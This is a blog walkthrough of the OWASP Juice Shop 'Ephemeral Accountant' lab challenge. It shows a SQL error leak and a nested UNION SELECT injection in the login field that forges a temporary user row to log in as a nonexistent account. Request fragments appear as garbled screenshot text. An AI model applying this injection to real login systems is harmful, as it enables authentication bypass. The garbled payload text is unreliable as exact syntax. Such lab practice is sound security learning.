Hacking OWASP’s Juice Shop Pt. 51: Ephemeral Accountant

Challenge: 

Name: Ephemeral Accountant

Description: Log in with the (non-existing) accountant acc0unt4nt@juice-sh.op without ever registering that user.

Difficulty: 4 star

Category: Injection

Expanded Description: https://pwning.owasp-juice.shop/part2/injection.html

Tools used:

Burp Suite, FoxyProxy

Resources used:

Solution Guide

Methodology: 

For the first time in this project, I found a challenge where the expanded description provided me with no ideas about a path forward. With a prohibition on adding the “acc0unt4nt@juice-sh.op” account to the user database table, I was completely stumped. I tried the few injection tricks I knew to no avail. At that point, I allowed myself to read the first bullet point in the challenge solution, which was ” Go to http://localhost:3000/#/login and try logging in with Email ‘ and any Password while observing the Browser DevTools network tab”

Login 
Email 
Password 
Forgot your password? 
Log in 
Remember me 
G Log in with Google 
Not yet a customer?

While I could have used the browser tools. I opted instead to use Burp Suite and FoxyProxy.

Response 
Headers 
Render 
Pretty 
Raw 
Action 
IX-Frame-options: SAMEORIGIN 
Feature-policy: payment 
self' 
Content -Type: application/ j son; 
Vary: Accept -Encoding 
Date: Red, 18 Nov 2020 19:27:21 
Connection: close 
Content -Length: 1285 
error" 
charset=utf 
GMT 
12 
31 
'SQL ITE ERROR: unrecognized token: \ '721See9c7d9dc229d2921a40e899ecsf\ 
'message 
stack 
sequelizeDatabaseError: SQL ITE ERROR: 
unrecognized token: 
\ " 721 see9c 7d9dc229d2921a40e899ecsf\ 
Sequel izeDatabaseError" , 
'name 
at 
Query 
. formatError 
( / juice 
parent " 
errno" : I, 
'code 
SQL ITE ERROR" , 
augmented" :true, 
'SELECT FROM 
original " 
errno" : I, 
'code 
'SQL ITE ERROR" , 
augmented 
':true, 
SELECT 
FROM 
SELECT 
Users 
Users 
RHERE email 
WHERE email 
AND password 
AND password 
AND password 
721 see9c7d9dc229d2921a40e899ecsf 
721 see9c7d9dc229d2921a40e899ecsf 
AND deletedAt 
AND deletedAt 
IS NULL" 
IS NULL" 
FROM Users WHERE email 
721See9c7d9dc229d2921a40e899ecsf' AND del etedAt IS NULL"

An md5 hashed space character wasn’t going to provide me with a means of ingress, so remembering that I’m here to learn new things, I grudgingly read the rest of the solution. In that solution, it was revealed that a nested UNION SELECT attack would be required to complete the challenge. Essentially the attack required the creation of an entirely new database table entry, but in a temporary capacity using “UNION SELECT * FROM (<entire fabricated User table entry>)–” as the syntax. So, if I’m correct, the UNION SELECT attack I crafted would create a temporary (some might say ephemeral) table entry without ever interacting with the User table, allowing me to log in a whoever I wanted to be.

email 
password 
UNION 
SELECT 
FROM 
( SELECT 
20 
AS 
as 
'username , 
account 4nt@j uice-sh 
op 
as 
email 
'test 1234' 
as 
password 
accounting 
as 
role 
123 
as 
deluxeToken 
'1.2.3.41 
as 
'last Loginlp
Request 
Param s Headers 
Raw 'Actions 
POST /rest/user/login HTTP/I.I 
Host: local host 3000 
User-Agent: MoziIIa/S.O (X 
11; Linux x86 64; 
rv•78 
application/ j son, text/ plain, I/ * 
Accept 
Accept -Language: en-lJS, en; q=O.S 
Accept -Encoding: gzip, deflate 
Content -Type: application/ j son 
Content -Length: 446 
Origin: http 
// I Ocal host 3000 
Connection: close 
Referer: http://localhost : 3000/ 
Response 
Headers 
Render 
Pretty 
Raw 
200 0K 
"SON web Tokens 
Actions V 
O) 
Geck 
10 
12 
14 
Cookle: language=en; welcomebanner status=dismiss; 
cookl 
Access-Cont rol -Allow-origin: 
X-Content -Type-options: nosniff 
IX-Frame-options: SAMEORIGIN 
Feature-policy: payment 
self' 
Content -Type: application/ j son; charset=utf- 
Content -Length: 
a-rag: R,' '331 -SKyH,NcNIRofubcLMRvErSGGC+Rk 
Vary: Accept -Encoding 
Date: Red, 18 Nov 2020 Gl•rr 
Connection: close 
authentication" 
email 
password 
UNION SELECT FROM (SELECT 20 AS 
"token 
'bid" : 6, 
'umail 
" eyJoeXAioiJKVIQiLCJhbGcioiJsuz11NiJ9.e 
account 4nt@j uice-sh op'
You successfully solved a challenge: Ephemeral Accountant (Log in with the (non- 
existing) accountant account4nt@juice-sh.op without ever registering that user.) X

Prevention and Mitigation Strategies:

OWASP Mitigation Cheat Sheet

Lessons Learned and Things Worth Mentioning:

I’m glad that my first post in this project included the disclaimer that I was going to wind up using the Solution Guide. My inexperience and desire to learn all of this stuff is admittedly tied to my ego, and I don’t like having to admit defeat. It is imperative, however, that I do just that. Failing to suppress that desire would impose significant limitations on my ability to both learn this material and complete this series of walkthroughs. I think this post will be the last time I’ll mention that I’m trying to learn new concepts as opposed to demonstrating mastery. As I clear up the last few four star challenges over the next week and move into the five star category, any further mentioning of my desire to complete challenges without assistance will be detrimental to the quality of the posts, as nearly all of them will require reference to the Solution Guide..

In order to maintain consistency, I’ll still list the Solution Guide in the list of resources used, lest my walkthroughs be mistaken for entirely organic content.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s